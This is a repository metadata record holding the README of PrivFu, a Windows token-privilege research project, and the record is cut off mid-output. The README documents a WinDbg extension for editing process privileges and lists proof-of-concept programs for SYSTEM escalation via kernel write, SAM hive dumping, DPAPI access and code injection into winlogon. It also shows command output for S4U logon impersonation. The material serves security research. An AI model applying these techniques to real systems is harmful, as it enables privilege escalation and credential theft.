{"id":13598282,"url":"https://github.com/daem0nc0re/PrivFu","last_synced_at":"2025-04-10T06:31:50.441Z","repository":{"id":40621810,"uuid":"442468298","full_name":"daem0nc0re/PrivFu","owner":"daem0nc0re","description":"Kernel mode WinDbg extension and PoCs for token privilege investigation.","archived":false,"fork":false,"pushed_at":"2024-11-03T10:04:18.000Z","size":13345,"stargazers_count":808,"open_issues_count":1,"forks_count":121,"subscribers_count":15,"default_branch":"main","last_synced_at":"2024-11-03T10:16:45.290Z","etag":null,"topics":["windbg","windbg-extension","windows","windows-kernel"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/daem0nc0re.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-28T13:14:25.000Z","updated_at":"2024-11-03T10:04:22.000Z","dependencies_parsed_at":"2023-09-29T03:30:25.238Z","dependency_job_id":"dbb097f0-a510-4b03-a768-9b2cdde042ee","html_url":"https://github.com/daem0nc0re/PrivFu","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daem0nc0re%2FPrivFu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/daem0nc0re","download_url":"https://codeload.github.com/daem0nc0re/PrivFu/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223427696,"owners_count":17143333,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["windbg","windbg-extension","windows","windows-kernel"],"created_at":"2024-08-01T17:00:51.318Z","updated_at":"2024-11-06T22:32:08.480Z","avatar_url":"https://github.com/daem0nc0re.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# PrivFu\nKernel mode WinDbg extension and PoCs for testing how token privileges work.\n\nThere are notable repository and articles about token privilege abuse such [Grzegorz Tworek](https://twitter.com/0gtweet)'s [Priv2Admin](https://github.com/gtworek/Priv2Admin).\nCodes in this repository are intended to help investigate how token privileges work.\n\n\n## Table Of Contents\n\n- [PrivFu](#privfu)\n - [ArtsOfGetSystem](#ArtsOfGetSystem)\n - [KernelWritePoCs](#KernelWritePoCs)\n - [PrivEditor](#priveditor)\n - [getps Command](#getps-command)\n - [getpriv Command](#getpriv-command)\n - [addpriv Command](#addpriv-command)\n - [rmpriv Command](#rmpriv-command)\n - [enablepriv Command](#enablepriv-command)\n - [disablepriv Command](#disablepriv-command)\n - [enableall Command](#enableall-command)\n - [disableall Command](#disableall-command)\n - [PrivilegedOperations](#privilegedoperations)\n - [S4uDelegator](#s4udelegator)\n - [SwitchPriv](#switchpriv)\n - [TokenDump](#tokendump)\n - [TokenAssignor](#tokenassignor)\n - [TrustExec](#trustexec)\n - [UserRightsUtil](#userrightsutil)\n - [Reference](#reference)\n - [Acknowledgments](#acknowledgments)\n\n## ArtsOfGetSystem\n\n[Back to Top](#privfu)\n\n[Project](./ArtsOfGetSystem)\n\nThis project covers how to get system privileges from high integrity level shell.\nSee [README.md](./ArtsOfGetSystem/README.md) for details.\n\n\n## KernelWritePoCs\n\n[Back to Top](#privfu)\n\n[Project](./KernelWritePoCs)\n\nThe purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerability.\nAll PoCs are written for [HackSys Extreme Vulnerable Driver](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver).\nMost of these PoCs perform to get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges.\nTested on Windows 10 version 1809/1903, but they should work most of Windows 10 theoretically:\n\n| PoC Name | Description |\n| :--- | :--- |\n| [CreateAssignTokenVariant](./KernelWritePoCs/CreateAssignTokenVariant/CreateAssignTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeAssignPrimaryTokenPrivilege`. |\n| [CreateImpersonateTokenVariant](./KernelWritePoCs/CreateImpersonateTokenVariant/CreateImpersonateTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeImpersonatePrivilege`. |\n| [CreateTokenVariant](./KernelWritePoCs/CreateTokenVariant/CreateTokenVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege`. |\n| [DebugInjectionVariant](./KernelWritePoCs/DebugInjectionVariant/DebugInjectionVariant.cs) | This PoC performs EoP with `SeDebugPrivilege`. Uses code injection to winlogon.exe at final stage. |\n| [DebugUpdateProcVariant](./KernelWritePoCs/DebugUpdateProcVariant/DebugUpdateProcVariant.cs) | This PoC performs EoP with `SeDebugPrivilege`. Creates SYSTEM process from winlogon.exe with `UpdateProcThreadAttribute` API at final stage. |\n| [RestoreServiceModificationVariant](./KernelWritePoCs/RestoreServiceModificationVariant/RestoreServiceModificationVariant.cs) | This PoC performs EoP with `SeRestorePrivilege`. Use [HijackShellLib](./KernelWritePoCs/HijackShellLib) with this PoC. |\n| [SecondaryLogonVariant](./KernelWritePoCs/SecondaryLogonVariant/SecondaryLogonVariant.cs) | This PoC performs EoP with `SeCreateTokenPrivilege` and `SeImpersonatePrivilege`. Uses secondary logon service at final stage. |\n| [TakeOwnershipServiceModificationVariant](./KernelWritePoCs/TakeOwnershipServiceModificationVariant/TakeOwnershipServiceModificationVariant.cs) | This PoC performs EoP with `SeTakeOwnershipPrivilege`. Use [HijackShellLib](./KernelWritePoCs/HijackShellLib) with this PoC. |\n| [TcbS4uAssignTokenVariant](./KernelWritePoCs/TcbS4uAssignTokenVariant/TcbS4uAssignTokenVariant.cs) | This PoC performs EoP with `SeTcbPrivilege`. Get System mandatory level shell from medium mandatory level. |\n| [TcbS4uImpersonationVariant](./KernelWritePoCs/TcbS4uImpersonationVariant/TcbS4uImpersonationVariant.cs) | This PoC performs EoP with `SeTcbPrivilege`. Performs thread impersonation with S4U logon. Not get high or system integrity level. |\n\n\n## PrivEditor\n\n[Back to Top](#privfu)\n\n[Project](./PrivEditor)\n\n\u003e __Warning__\n\u003e \n\u003e In some environment, Debug build does not work.\n\u003e Release build is preferred.\n\nPrivEditor is kernel mode WinDbg extension to manipulate token privilege of specific process.\nThis extension makes it easy to configure the token privilege you want to investigate:\n\n```\n0: kd\u003e .load C:\\dev\\PrivEditor\\x64\\Release\\PrivEditor.dll\n\nPrivEditor - Kernel Mode WinDbg extension for token privilege edit.\n\nCommands :\n + !getps : List processes in target system.\n + !getpriv : List privileges of a process.\n + !addpriv : Add privilege(s) to a process.\n + !rmpriv : Remove privilege(s) from a process.\n + !enablepriv : Enable privilege(s) of a process.\n + !disablepriv : Disable privilege(s) of a process.\n + !enableall : Enable all privileges available to a process.\n + !disableall : Disable all privileges available to a process.\n\n[*] To see command help, execute \"!\u003cCommand\u003e help\" or \"!\u003cCommand\u003e /?\".\n```\n\n\n### getps Command\nThis command is to list processes in your target system:\n\n```\n0: kd\u003e !getps /?\n\n!getps - List processes in target system.\n\nUsage : !getps [Process Name]\n\n Process Name : (OPTIONAL) Specifies filter string for process name.\n```\n\nIf you execute this command without any arguments, this command list all processes in your target system as follows:\n\n```\n0: kd\u003e !getps\n\n PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name\n======== =================== ======================== ============\n 0 0xfffff805`81233630 0x00000000`00000000 Idle\n 4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System\n 68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe\n 88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry\n 324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe\n 348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe\n 408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe\n 480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe\n 484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe\n 500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe\n 580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe\n\n--snip--\n```\n\nIf you want to know specific processes, set string filter as follows.\nThe filter works with forward matching and case insensitive:\n\n```\n0: kd\u003e !getps micro\n\n PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name\n======== =================== ======================== ============\n 4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe\n 4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe\n 4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe\n```\n\n\n### getpriv Command\nThis command is to list token privileges of a specific process:\n\n```\n0: kd\u003e !getpriv /?\n\n!getpriv - List privileges of a process.\n\nUsage : !getpriv \u003cPID\u003e\n\n PID : Specifies target process ID.\n```\n\nTo use this command, you need to set a target process ID in decimal format as follows:\n\n```\n0: kd\u003e !getpriv 5704\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 5704\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n```\n\n\n### addpriv Command\nThis command is to add token privilege(s) to a specific process:\n\n```\n0: kd\u003e !addpriv /?\n\n!addpriv - Add privilege(s) to a process.\n\nUsage : !addpriv \u003cPID\u003e \u003cPrivilege\u003e\n\n PID : Specifies target process ID.\n Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n + CreateToken : SeCreateTokenPrivilege.\n + AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.\n + LockMemory : SeLockMemoryPrivilege.\n + IncreaseQuota : SeIncreaseQuotaPrivilege.\n + MachineAccount : SeMachineAccountPrivilege.\n + Tcb : SeTcbPrivilege.\n + Security : SeSecurityPrivilege.\n + TakeOwnership : SeTakeOwnershipPrivilege.\n + LoadDriver : SeLoadDriverPrivilege.\n + SystemProfile : SeSystemProfilePrivilege.\n + Systemtime : SeSystemtimePrivilege.\n + ProfileSingleProcess : SeProfileSingleProcessPrivilege.\n + IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.\n + CreatePagefile : SeCreatePagefilePrivilege.\n + CreatePermanent : SeCreatePermanentPrivilege.\n + Backup : SeBackupPrivilege.\n + Restore : SeRestorePrivilege.\n + Shutdown : SeShutdownPrivilege.\n + Debug : SeDebugPrivilege.\n + Audit : SeAuditPrivilege.\n + SystemEnvironment : SeSystemEnvironmentPrivilege.\n + ChangeNotify : SeChangeNotifyPrivilege.\n + RemoteShutdown : SeRemoteShutdownPrivilege.\n + Undock : SeUndockPrivilege.\n + SyncAgent : SeSyncAgentPrivilege.\n + EnableDelegation : SeEnableDelegationPrivilege.\n + ManageVolume : SeManageVolumePrivilege.\n + Impersonate : SeImpersonatePrivilege.\n + CreateGlobal : SeCreateGlobalPrivilege.\n + TrustedCredManAccess : SeTrustedCredManAccessPrivilege.\n + Relabel : SeRelabelPrivilege.\n + IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.\n + TimeZone : SeTimeZonePrivilege.\n + CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.\n + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.\n + All : All privileges.\n```\n\nFor example, if you want to set SeDebugPrivilege to a specific process, set a target process ID for the first argument and shorten privilege name `debug` as listed in the help message for second argument as follows:\n\n```\n0: kd\u003e !getpriv 5704\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 5704\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n\n0: kd\u003e !addpriv 5704 debug\n\n[\u003e] Trying to add SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 5704\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeDebugPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 5704\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f141e4c0\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0\n```\n\nThe privilege name argument is case insensitive.\n\nIf you want to add all token privileges at a time, set `all` as the privilege name argument:\n\n```\n0: kd\u003e !addpriv 5704 all\n\n[\u003e] Trying to add all privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 5704\n\nPrivilege Name State\n========================================== ========\nSeCreateTokenPrivilege Disabled\nSeAssignPrimaryTokenPrivilege Disabled\nSeLockMemoryPrivilege Disabled\nSeIncreaseQuotaPrivilege Disabled\nSeMachineAccountPrivilege Disabled\nSeTcbPrivilege Disabled\nSeSecurityPrivilege Disabled\n\n--snip--\n```\n\n\n### rmpriv Command\nThis command is to remove token privilege(s) from a specific process:\n\n```\n0: kd\u003e !rmpriv /?\n\n!rmpriv - Remove privilege(s) from a process.\n\nUsage : !rmpriv \u003cPID\u003e \u003cPrivilege\u003e\n\n PID : Specifies target process ID.\n Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n + CreateToken : SeCreateTokenPrivilege.\n + AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.\n + LockMemory : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nIf you want to remove SeChangeNotifyPrivilege, execute this command as follows:\n\n```\n0: kd\u003e !getpriv 352\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 352\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n\n0: kd\u003e !rmpriv 352 changenotify\n\n[\u003e] Trying to remove SeChangeNotifyPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 352\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 352\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n```\n\nAs `!addpriv` command, you can remove all token privileges at a time by setting `all` as the privilege name argument:\n\n```\n0: kd\u003e !rmpriv 352 all\n\n[\u003e] Trying to remove all privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 352\n\nPrivilege Name State\n========================================== ========\n\n[*] PID : 352\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770\n```\n\n\n### enablepriv Command\nThis command is to enable token privilege(s) of a specific process:\n\n```\n0: kd\u003e !enablepriv /?\n\n!enablepriv - Enable privilege(s) of a process.\n\nUsage : !enablepriv \u003cPID\u003e \u003cPrivilege\u003e\n\n PID : Specifies target process ID.\n Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n + CreateToken : SeCreateTokenPrivilege.\n + AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.\n + LockMemory : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nThe first argument is for process ID, and the second is for token privilege name:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !enablepriv 1932 timezone\n\n[\u003e] Trying to enable SeTimeZonePrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Enabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\nIf you tried to enable privilege(s), not added yet, this command adds it automatically:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Enabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !enablepriv 1932 debug\n\n[*] SeDebugPrivilege is not present.\n[\u003e] Trying to add SeDebugPrivilege.\n[\u003e] Trying to enable SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeDebugPrivilege Enabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Enabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\n\n### disablepriv Command\nThis command is to disable token privilege(s) of a specific process:\n\n```\n0: kd\u003e !disablepriv /?\n\n!disablepriv - Disable privilege(s) of a process.\n\nUsage : !disablepriv \u003cPID\u003e \u003cPrivilege\u003e\n\n PID : Specifies target process ID.\n Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.\n\n + CreateToken : SeCreateTokenPrivilege.\n + AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.\n + LockMemory : SeLockMemoryPrivilege.\n\n--snip--\n```\n\nTo use this command, set a target process ID for the first argument and token privilege name for the second argument:\n\n```\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeDebugPrivilege Enabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Enabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n\n0: kd\u003e !disablepriv 1932 debug\n\n[\u003e] Trying to disable SeDebugPrivilege.\n[*] Done.\n\n0: kd\u003e !getpriv 1932\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeDebugPrivilege Disabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Enabled\n\n[*] PID : 1932\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd60f`f17c6080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0\n```\n\n\n### enableall Command\nThis command is to enable all token privilege(s) available for a specific process:\n\n```\n0: kd\u003e !enableall /?\n\n!enableall - Enable all privileges available to a process.\n\nUsage : !enableall \u003cPID\u003e\n\n PID : Specifies target process ID.\n```\n\nIt works as follows:\n\n```\n0: kd\u003e !getpriv 3792\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Disabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\n\n[*] PID : 3792\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n\n0: kd\u003e !enableall 3792\n\n[\u003e] Trying to enable all available privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 3792\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Enabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Enabled\n\n[*] PID : 3792\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n```\n\n\n### disableall Command\nThis command is to disable all token privilege(s) for a specific process:\n\n```\n0: kd\u003e !disableall /?\n\n!disableall - Disable all privileges available to a process.\n\nUsage : !disableall \u003cPID\u003e\n\n PID : Specifies target process ID.\n```\n\nThis command is equivalent to `!disablepriv \u003cPID\u003e all`. Works as follows:\n\n```\n0: kd\u003e !getpriv 3792\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Enabled\nSeChangeNotifyPrivilege Enabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Enabled\n\n[*] PID : 3792\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n\n0: kd\u003e !disableall 3792\n\n[\u003e] Trying to disable all available privileges.\n[*] Done.\n\n0: kd\u003e !getpriv 3792\n\nPrivilege Name State\n========================================== ========\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege Disabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\n\n[*] PID : 3792\n[*] Process Name : cmd.exe\n[*] nt!_EPROCESS : 0xffffd507`aaed9080\n[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0\n```\n\n\n## PrivilegedOperations\n\n[Back to Top](#privfu)\n\n[Project](./PrivilegedOperations)\n\nThis project is PoCs for sensitive token privileges such `SeDebugPrivilege`.\nCurrently, released PoCs for a part of them.\n\n| Program Name | Description |\n| :--- | :--- |\n| [SeAuditPrivilegePoC](./PrivilegedOperations/SeAuditPrivilegePoC) | This PoC tries to create new security event(s) by `SeAuditPrivilegePoC`. `SeAuditPrivilege` does not require high integrity level, but this PoC requires administrative privileges at the first execution to install new event source. Additionally, to confirm the result, this PoC may require modification of local security policy setting. |\n| [SeBackupPrivilegePoC](./PrivilegedOperations/SeBackupPrivilegePoC) | This PoC tries to dump `HKLM\\SAM` by `SeBackupPrivilege`. |\n| [SeCreatePagefilePrivilegePoC](./PrivilegedOperations/SeCreatePagefilePrivilegePoC) | This PoC tries to set pagefile option to specific values by `SeCreatePagefilePrivilege`. |\n| [SeCreateTokenPrivilegePoC](./PrivilegedOperations/SeCreateTokenPrivilegePoC) | This PoC tries to create a elevated token by `SeCreateTokenPrivilege`. |\n| [SeDebugPrivilegePoC](./PrivilegedOperations/SeDebugPrivilegePoC) | This PoC tries to open a handle to winlogon.exe by `SeDebugPrivilege`. |\n| [SeRestorePrivilegePoC](./PrivilegedOperations/SeRestorePrivilegePoC) | This PoC tries to write test file in `C:\\Windows\\System32\\` by `SeRestorePrivilege`. |\n| [SeSecurityPrivilegePoC](./PrivilegedOperations/SeSecurityPrivilegePoC) | This PoC tries to read the latest security event by `SeSecurityPrivilege`. |\n| [SeShutdownPrivilegePoC](./PrivilegedOperations/SeShutdownPrivilegePoC) | This PoC tries to cause BSOD by `SeShutdownPrivilege`. |\n| [SeSystemEnvironmentPrivilegePoC](./PrivilegedOperations/SeSystemEnvironmentPrivilegePoC) | This PoC tries to enumerate system environment by `SeSystemEnvironmentPrivilege`. Works for UEFI based system only. Due to OS functionality, this PoC does not work for OSes earlier Windows 10 Build 1809. |\n| [SeTakeOwnershipPrivilegePoC](./PrivilegedOperations/SeTakeOwnershipPrivilegePoC) | This PoC tries to change the owner of `HKLM:\\SYSTEM\\CurrentControlSet\\Services\\dmwappushservice` to the caller user account by `SeTakeOwnershipPrivilege`. |\n| [SeTcbPrivilegePoC](./PrivilegedOperations/SeTcbPrivilegePoC) | This PoC tries to perform S4U Logon to be `Builtin\\Backup Operators` by `SeTcbPrivilege`. |\n| [SeTrustedCredManAccessPrivilegePoC](./PrivilegedOperations/SeTrustedCredManAccessPrivilegePoC) | This PoC tries to access DPAPI blob by `SeTrustedCredManAccessPrivilege`. |\n\n## S4uDelegator\n\n[Back to Top](#privfu)\n\n[Project](./S4uDelegator)\n\nThis tool is to perform S4U logon with SeTcbPrivilege.\nTo perform S4U logon with this tool, administrative privileges are required.\n\n```\nPS C:\\Tools\u003e .\\S4uDelegator.exe -h\n\nS4uDelegator - Tool for S4U Logon.\n\nUsage: S4uDelegator.exe [Options]\n\n -h, --help : Displays this help message.\n -l, --lookup : Flag to lookup account SID.\n -x, --execute : Flag to execute command.\n -c, --command : Specifies command to execute. Default is cmd.exe.\n -d, --domain : Specifies domain name to lookup or S4U logon.\n -e, --extra : Specifies group SIDs you want to add for S4U logon with comma separation.\n -n, --name : Specifies account name to lookup or S4U logon.\n -s, --sid : Specifies SID to lookup.\n```\n\nTo use this tool, `-l` or `-x` flag must be specified.\n`-l` flag is for looking up account information as follows:\n\n```\nPS C:\\Tools\u003e .\\S4uDelegator.exe -l -d contoso -n \"domain admins\"\n\n[*] Account Name : CONTOSO\\Domain Admins\n[*] SID : S-1-5-21-3654360273-254804765-2004310818-512\n[*] Account Type : Group\n\nPS C:\\Tools\u003e .\\S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736\n\n[*] Account Name : NT SERVICE\\WinDefend\n[*] SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736\n[*] Account Type : WellKnownGroup\n```\n\nTo execute command with S4U logon, set `-x` flag, and specify account name or SID as follows.\nCommand to execute can be specified with `-c` option (default is `cmd.exe`):\n\n```\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n============ =============================================\ncontoso\\jeff S-1-5-21-3654360273-254804765-2004310818-1105\nPS C:\\Tools\u003e .\\S4uDelegator.exe -x -d . -n admin\n\n[*] S4U logon target information:\n [*] Account : CL01\\admin\n [*] SID : S-1-5-21-2659926013-4203293582-4033841475-500\n [*] UPN : (Null)\n [*] Type : User\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privileges.\n[\u003e] Trying to S4U logon.\n[+] S4U logon is successful.\n[\u003e] Trying to create a token assigned process.\nMicrosoft Windows [Version 10.0.18362.175]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Tools\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n========== =============================================\ncl01\\admin S-1-5-21-2659926013-4203293582-4033841475-500\n```\n\nIf you want to add extra group information, set group SIDs with comma separated value with `-e` option as follows:\n\n```\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n============= =============================================\ncontoso\\david S-1-5-21-3654360273-254804765-2004310818-1104\nPS C:\\Tools\u003e .\\S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell\n\n[*] S4U logon target information:\n [*] Account : CONTOSO\\jeff\n [*] SID : S-1-5-21-3654360273-254804765-2004310818-1105\n [*] UPN : jeff@contoso.local\n [*] Type : User\n[\u003e] Verifying extra group SID(s).\n[*] BUILTIN\\Administrators (SID : S-1-5-32-544) will be added as a group.\n[*] NT AUTHORITY\\NETWORK SERVICE (SID : S-1-5-20) will be added as a group.\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privileges.\n[\u003e] Trying to S4U logon.\n[+] S4U logon is successful.\n[\u003e] Trying to create a token assigned process.\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nTry the new cross-platform PowerShell https://aka.ms/pscore6\n\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n============ =============================================\ncontoso\\jeff S-1-5-21-3654360273-254804765-2004310818-1105\nPS C:\\Tools\u003e whoami /groups \nGROUP 